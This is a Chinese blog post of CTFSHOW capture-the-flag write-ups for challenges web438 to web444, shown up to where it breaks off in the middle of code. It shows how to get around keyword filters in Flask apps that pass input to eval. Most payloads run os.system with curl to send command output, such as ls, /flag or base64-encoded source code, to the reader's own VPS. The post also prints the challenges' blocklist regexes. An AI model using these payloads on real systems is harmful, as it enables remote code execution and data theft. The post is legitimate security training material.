<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><title>CTFSHOW | 其他篇题解（三）web438 - web460 - WayneJH Blog</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="WayneJH Blog"><meta name="msapplication-TileImage" content="https://oss.waynejoons.icu/picphoto/favicon.ico"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="WayneJH Blog"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="Welcome to WayneJH Blog - CTF writeups and cybersecurity insights. Here you can learn a lot about cybersecurity knowledge"><meta property="og:type" content="blog"><meta property="og:title" content="CTFSHOW | 其他篇题解（三）web438 - web460"><meta property="og:url" content="https://waynejoon.github.io/posts/ctfshow-others-3-web438-web460/"><meta property="og:site_name" content="WayneJH Blog"><meta property="og:description" content="Welcome to WayneJH Blog - CTF writeups and cybersecurity insights. Here you can learn a lot about cybersecurity knowledge"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://waynejoon.github.io/img/waynejoon.jpg"><meta property="article:published_time" content="2025-08-27T07:50:29.000Z"><meta property="article:modified_time" content="2025-08-27T07:51:36.666Z"><meta property="article:author" content="WayneJoon.H"><meta property="article:tag" content="CTFSHOW"><meta property="article:tag" content="CTF练习"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="https://waynejoon.github.io/img/waynejoon.jpg"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://waynejoon.github.io/posts/ctfshow-others-3-web438-web460/"},"headline":"CTFSHOW | 其他篇题解（三）web438 - web460","image":["https://waynejoon.github.io/img/waynejoon.jpg"],"datePublished":"2025-08-27T07:50:29.000Z","dateModified":"2025-08-27T07:51:36.666Z","author":{"@type":"Person","name":"WayneJoon.H"},"publisher":{"@type":"Organization","name":"WayneJH Blog","logo":{"@type":"ImageObject","url":{"text":"WayneJH"}}},"description":"CTFSHOW 其他篇第三部分详细题解"}</script><link rel="canonical" href="https://waynejoon.github.io/posts/ctfshow-others-3-web438-web460/"><link rel="icon" href="https://oss.waynejoons.icu/picphoto/favicon.ico"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v6.0.0/css/all.css"><link data-pjax rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@11.7.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link data-pjax rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }

          const id = '#' + CSS.escape(location.hash.substring(1));
          const $tabMenu = document.querySelector(`.tabs a[href="${id}"]`);
          if (!$tabMenu) {
            return;
          }

          const $tabMenuContainer = $tabMenu.parentElement.parentElement;
          Array.from($tabMenuContainer.children).forEach($menu => $menu.classList.remove('is-active'));
          Array.from($tabMenuContainer.querySelectorAll('a'))
              .map($menu => document.getElementById($menu.getAttribute("href").substring(1)))
              .forEach($content => $content.classList.add('is-hidden'));

          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
          const $activeTab = document.querySelector(id);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="WayneJH Blog" type="application/atom+xml">
</head><body class="is-3-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/">WayneJH</a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">首页</a><a class="navbar-item" href="/archives">归档</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/tags">标签</a><a class="navbar-item" href="/links">友链</a><a class="navbar-item" href="/about">关于</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="GitHub" href="https://github.com/waynejoon"><i class="fab fa-github"></i></a><a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-8-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item"><time dateTime="2025-08-27T07:50:29.000Z" title="2025/8/27 15:50:29">2025-08-27</time>发表</span><span class="level-item"><a class="link-muted" href="/categories/CTFSHOW/">CTFSHOW</a></span><span class="level-item">32 分钟读完 (大约4845个字)</span><span class="level-item" id="busuanzi_container_page_pv" style="display:none"><span id="busuanzi_value_page_pv">--</span>次访问</span></div></div><h1 class="title is-3 is-size-4-mobile">CTFSHOW | 其他篇题解（三）web438 - web460</h1><div class="content"><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>由于题目比较多，所以分三个部分来写，这是第三部分</p>
<h2 id="题目列表"><a href="#题目列表" class="headerlink" title="题目列表"></a>题目列表</h2><h3 id="web438"><a href="#web438" class="headerlink" title="web438"></a>web438</h3><p>这题跟web435方法一样，我们简单回顾一下过程</p>
<p>为了绕过限制，可以反转代码来执行，具体方法是用<strong>字符串切片</strong>方法来反转字符串</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=str(&#x27;)&quot;`sl`=p?反转端口:你的反转vps地址//:ptth lruc&quot;(metsys.so ;so tropmi&#x27;[::-1])</span><br></pre></td></tr></table></figure>

<p>可以先用<code>str</code>在网页看原始代码，检查是否正确</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250822185008504.png"></p>
<p>然后套个<code>exec</code>执行这串代码就可以</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=str(exec(&#x27;)&quot;`sl`=p?反转端口:你的反转vps地址//:ptth lruc&quot;(metsys.so ;so tropmi&#x27;[::-1]))</span><br></pre></td></tr></table></figure>

<p>我们把它的源码爆出来看看</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=str(exec(&#x27;)&quot;`yp.ppa 0 w- 46esab`=p?反转端口:你的反转vps地址//:ptth lruc&quot;(metsys.so ;so tropmi&#x27;[::-1]))</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">Q2B</span>(<span class="params">uchar</span>):</span><br><span class="line">    inside_code = <span class="built_in">ord</span>(uchar)</span><br><span class="line">    <span class="keyword">if</span> inside_code == <span class="number">0x3000</span>:</span><br><span class="line">        inside_code = <span class="number">0x0020</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        inside_code -= <span class="number">0xfee0</span></span><br><span class="line">    <span class="keyword">if</span> inside_code &lt; <span class="number">0x0020</span> <span class="keyword">or</span> inside_code &gt; <span class="number">0x7e</span>: </span><br><span class="line">        <span class="keyword">return</span> uchar</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">chr</span>(inside_code)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">stringQ2B</span>(<span class="params">ustring</span>):</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;&quot;</span>.join([Q2B(uchar) <span class="keyword">for</span> uchar <span class="keyword">in</span> ustring])</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">app_index</span>():</span><br><span class="line">    code = request.args.get(<span class="string">&#x27;code&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> code:</span><br><span class="line">    	code = stringQ2B(code)</span><br><span class="line">    	<span class="keyword">if</span> <span class="string">&#x27;\\u&#x27;</span> <span class="keyword">in</span> code:</span><br><span class="line">    		<span class="keyword">return</span> <span class="string">&#x27;hacker?&#x27;</span></span><br><span class="line">    	reg = re.<span class="built_in">compile</span>(<span class="string">r&#x27;os|open|system|read|eval|builtins|curl|_|getattr|&#123;&#x27;</span>)</span><br><span class="line">    	<span class="keyword">if</span> reg.search(code)==<span class="literal">None</span>:</span><br><span class="line">    		<span class="keyword">return</span> <span class="built_in">eval</span>(code)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;where is flag?&lt;!-- /?code --&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>,port=<span class="number">80</span>)</span><br></pre></td></tr></table></figure>

<p>这题比web437多过滤了<code>&#123;</code>，但这个符号我们用不到，所以不影响</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=str(exec(&#x27;)&quot;`galf/ tac`=p?反转端口:你的反转vps地址//:ptth lruc&quot;(metsys.so ;so tropmi&#x27;[::-1]))</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250824004807436.png"></p>
<h3 id="web439"><a href="#web439" class="headerlink" title="web439"></a>web439</h3><p>这题可以继续用上题的方法，我们把源码爆出来分析一下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=str(exec(&#x27;)&quot;`yp.ppa 0 w- 46esab`=p?反转端口:你的反转vps地址//:ptth lruc&quot;(metsys.so ;so tropmi&#x27;[::-1]))</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">Q2B</span>(<span class="params">uchar</span>):</span><br><span class="line">    inside_code = <span class="built_in">ord</span>(uchar)</span><br><span class="line">    <span class="keyword">if</span> inside_code == <span class="number">0x3000</span>:</span><br><span class="line">        inside_code = <span class="number">0x0020</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        inside_code -= <span class="number">0xfee0</span></span><br><span class="line">    <span class="keyword">if</span> inside_code &lt; <span class="number">0x0020</span> <span class="keyword">or</span> inside_code &gt; <span class="number">0x7e</span>: </span><br><span class="line">        <span class="keyword">return</span> uchar</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">chr</span>(inside_code)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">stringQ2B</span>(<span class="params">ustring</span>):</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;&quot;</span>.join([Q2B(uchar) <span class="keyword">for</span> uchar <span class="keyword">in</span> ustring])</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">app_index</span>():</span><br><span class="line">    code = request.args.get(<span class="string">&#x27;code&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> code:</span><br><span class="line">    	code = stringQ2B(code)</span><br><span class="line">    	<span class="keyword">if</span> <span class="string">&#x27;\\u&#x27;</span> <span class="keyword">in</span> code:</span><br><span class="line">    		<span class="keyword">return</span> <span class="string">&#x27;hacker?&#x27;</span></span><br><span class="line">    	<span class="keyword">if</span> <span class="string">&#x27;\\x&#x27;</span> <span class="keyword">in</span> code:</span><br><span class="line">    		<span class="keyword">return</span> <span class="string">&#x27;hacker?&#x27;</span></span><br><span class="line">    	reg = re.<span class="built_in">compile</span>(<span class="string">r&#x27;os|open|system|read|eval|builtins|curl|_|getattr|&#123;&#x27;</span>)</span><br><span class="line">    	<span class="keyword">if</span> reg.search(code)==<span class="literal">None</span>:</span><br><span class="line">    		<span class="keyword">return</span> <span class="built_in">eval</span>(code)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;where is flag?&lt;!-- /?code --&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>,port=<span class="number">80</span>)</span><br></pre></td></tr></table></figure>

<p>可以看到这题比上题多过滤了<code>\x</code>，<code>\x</code> 是一种<strong>转义序列</strong>，用来表示十六进制形式的字符，比如 <code>\x41</code> 代表 ASCII 字符 <code>&#39;A&#39;</code></p>
<p>但是我们并没有用到这个，所以不影响</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=str(exec(&#x27;)&quot;`galf/ tac`=p?反转端口:你的反转vps地址//:ptth lruc&quot;(metsys.so ;so tropmi&#x27;[::-1]))</span><br></pre></td></tr></table></figure>

<h3 id="web440"><a href="#web440" class="headerlink" title="web440"></a>web440</h3><p>这题把引号禁了，我们可以用<strong>chr构造字符串</strong>。先用ord返回unicode数值，然后再经过chr转换成字符即可，我们写个python脚本</p>
<p>payload：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">s = <span class="string">&quot;import os;os.system(&#x27;curl http://你的vps地址:端口?p=`ls`&#x27;)&quot;</span></span><br><span class="line">res = <span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> s:</span><br><span class="line">    res += <span class="string">f&quot;chr(<span class="subst">&#123;<span class="built_in">ord</span>(i)&#125;</span>)%2B&quot;</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;str(exec(&#x27;</span>+res[:-<span class="number">3</span>]+<span class="string">&#x27;))&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>把结果拼接到网站GET发送</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=你的代码运行结果</span><br></pre></td></tr></table></figure>

<p>修改命令为<code>cat /flag</code>获取flag即可</p>
<h3 id="web441"><a href="#web441" class="headerlink" title="web441"></a>web441</h3><p>经过分析，这题把加号过滤了，放出部分源码看看</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">re.<span class="built_in">compile</span>(<span class="string">r&#x27;os|open|system|read|eval|builtins|curl|_|getattr|&#123;|\&#x27;|&quot;|\+&#x27;</span>)</span><br><span class="line">    	<span class="keyword">if</span> reg.search(code)==<span class="literal">None</span>:</span><br><span class="line">    		<span class="keyword">return</span> <span class="built_in">eval</span>(code)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;where is flag?&lt;!-- /?code --&gt;&#x27;</span></span><br></pre></td></tr></table></figure>

<p>那我们用<strong>join函数</strong>来拼接字符即可，例如<code>.join([&#39;1&#39;,&#39;2&#39;,&#39;3&#39;])</code>，结果是 ‘123’。 <strong>join必须作为字符串的方法调用</strong>，即调用它的对象必须是字符串，所以前面要有字符串和点号（<code>.</code>）来调用该函数</p>
<p>payload：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">s = <span class="string">&quot;import os;os.system(&#x27;curl http://你的vps地址:端口?p=`ls`&#x27;)&quot;</span></span><br><span class="line">res = <span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> s:</span><br><span class="line">    res += <span class="string">f&quot;chr(<span class="subst">&#123;<span class="built_in">ord</span>(i)&#125;</span>),&quot;</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;exec(str().join([&#x27;</span>+res[:-<span class="number">1</span>]+<span class="string">&#x27;]))&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>把结果拼接到网站GET发送</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=你的代码运行结果</span><br></pre></td></tr></table></figure>

<p>修改命令为<code>cat /flag</code>获取flag即可</p>
<h3 id="web442"><a href="#web442" class="headerlink" title="web442"></a>web442</h3><p>这题把数字过滤了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">re.<span class="built_in">compile</span>(<span class="string">r&#x27;os|open|system|read|eval|builtins|curl|_|getattr|&#123;|\&#x27;|&quot;|\+|[0-9]&#x27;</span>)</span><br><span class="line">    	<span class="keyword">if</span> reg.search(code)==<span class="literal">None</span>:</span><br><span class="line">    		<span class="keyword">return</span> <span class="built_in">eval</span>(code)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;where is flag?&lt;!-- /?code --&gt;&#x27;</span></span><br></pre></td></tr></table></figure>

<p>我们用<code>request.args.get</code>方法获取参数值即可。<code>request.args.get</code> 是 Flask 框架中获取 URL 查询参数（即 GET 请求中 URL 中 <code>?key=value</code> 部分参数）的方法</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=str(exec(request.args.get(request.method)))&amp;GET=import os;os.system(&#x27;curl http://你的vps地址:端口?p=`cat /flag`&#x27;)</span><br></pre></td></tr></table></figure>

<h3 id="web443"><a href="#web443" class="headerlink" title="web443"></a>web443</h3><p>把request过滤了，关键代码如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">re.<span class="built_in">compile</span>(<span class="string">r&#x27;os|open|system|read|eval|builtins|curl|_|getattr|&#123;|\&#x27;|&quot;|\+|[0-9]|request&#x27;</span>)</span><br><span class="line">        	<span class="keyword">if</span> reg.search(code)==<span class="literal">None</span>:</span><br><span class="line">        		<span class="keyword">return</span> <span class="built_in">eval</span>(code)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;where is flag?&lt;!-- /?code --&gt;&#x27;</span></span><br></pre></td></tr></table></figure>

<p>题目提示<strong>提交参数为POST</strong>，那我们后面用POST提交数据</p>
<p>这题我们可以继续用<code>request.args.get</code>，不过里面的<code>request</code>需要变换一下。我们打印全局变量出来看看</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">code=str(globals())</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250826171726164.png"></p>
<p>可以看到里面有个键是<code>request</code>，我们要利用的就是这个。由于Python 中列表、元组、字符串等序列的索引是<strong>从 0 开始</strong>的，所以<code>request</code>所在的索引为10。又因为数字和加号被禁了，所以我们可以用<code>True</code>来表示1，用两个减号表示加号</p>
<p>因此10可以这么写</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="literal">True</span>-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)</span><br></pre></td></tr></table></figure>

<p>然后用<code>list(globals().keys())[]</code>来获取对应的键名，再放进<code>globals()[]</code>获取对应的属性和方法，从而调用<code>args.get()</code>获取参数值</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">globals</span>()[<span class="built_in">list</span>(<span class="built_in">globals</span>().keys())[<span class="literal">True</span>-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)]]</span><br></pre></td></tr></table></figure>

<p>可以把这个理解为<code>request</code>，那么<code>request.args.get(request.method)</code>就等于</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">globals</span>()[<span class="built_in">list</span>(<span class="built_in">globals</span>().keys())[<span class="literal">True</span>-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)]].args.get(<span class="built_in">globals</span>()[<span class="built_in">list</span>(<span class="built_in">globals</span>().keys())[<span class="literal">True</span>-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)-(-<span class="literal">True</span>)]].method)</span><br></pre></td></tr></table></figure>

<p>然后在路径后面拼接参数POST，传入代码即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?POST=import os;os.system(&#x27;curl http://你的vps地址:端口?p=`ls`&#x27;)</span><br></pre></td></tr></table></figure>

<p>到这里，我们成功把代码弄好了，可以用str函数打印出来验证一下，POST传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">code=str(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].args.get(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].method))</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250826174834988.png"></p>
<p>最后用exec函数运行代码即可</p>
<p>POST传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">code=str(exec(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].args.get(globals()[list(globals().keys())[True-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)-(-True)]].method)))</span><br></pre></td></tr></table></figure>

<p>GET传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?POST=import os;os.system(&#x27;curl http://你的vps地址:端口?p=`cat /flag`&#x27;)</span><br></pre></td></tr></table></figure>

<h3 id="web444"><a href="#web444" class="headerlink" title="web444"></a>web444</h3><p>这题的附件把代码给出来了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">Q2B</span>(<span class="params">uchar</span>):</span><br><span class="line">    inside_code = <span class="built_in">ord</span>(uchar)</span><br><span class="line">    <span class="keyword">if</span> inside_code == <span class="number">0x3000</span>:</span><br><span class="line">        inside_code = <span class="number">0x0020</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        inside_code -= <span class="number">0xfee0</span></span><br><span class="line">    <span class="keyword">if</span> inside_code &lt; <span class="number">0x0020</span> <span class="keyword">or</span> inside_code &gt; <span class="number">0x7e</span>: </span><br><span class="line">        <span class="keyword">return</span> uchar</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">chr</span>(inside_code)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">stringQ2B</span>(<span class="params">ustring</span>):</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;&quot;</span>.join([Q2B(uchar) <span class="keyword">for</span> uchar <span class="keyword">in</span> ustring])</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span>,methods=[<span class="string">&#x27;POST&#x27;</span>, <span class="string">&#x27;GET&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">app_index</span>():</span><br><span class="line">    <span class="keyword">if</span> request.method == <span class="string">&#x27;POST&#x27;</span>:</span><br><span class="line">        code = request.form[<span class="string">&#x27;code&#x27;</span>]</span><br><span class="line">        <span class="keyword">if</span> code:</span><br><span class="line">        	code = stringQ2B(code)</span><br><span class="line">        	<span class="keyword">if</span> <span class="string">&#x27;\\u&#x27;</span> <span class="keyword">in</span> code:</span><br><span class="line">        		<span class="keyword">return</span> <span class="string">&#x27;hacker?&#x27;</span></span><br><span class="line">        	<span class="keyword">if</span> <span class="string">&#x27;\\x&#x27;</span> <span class="keyword">in</span> code:</span><br><span class="line">        		<span class="keyword">return</span> <span class="string">&#x27;hacker?&#x27;</span></span><br><span class="line">        	reg = re.<span class="built_in">compile</span>(<span class="string">r&#x27;os|open|system|read|eval|builtins|curl|_|getattr|&#123;|\&#x27;|&quot;|\+|[0-9]|request|len&#x27;</span>)</span><br><span class="line">        	<span class="keyword">if</span> reg.search(code)==<span class="literal">None</span>:</span><br><span class="line">        		<span class="keyword">return</span> <span 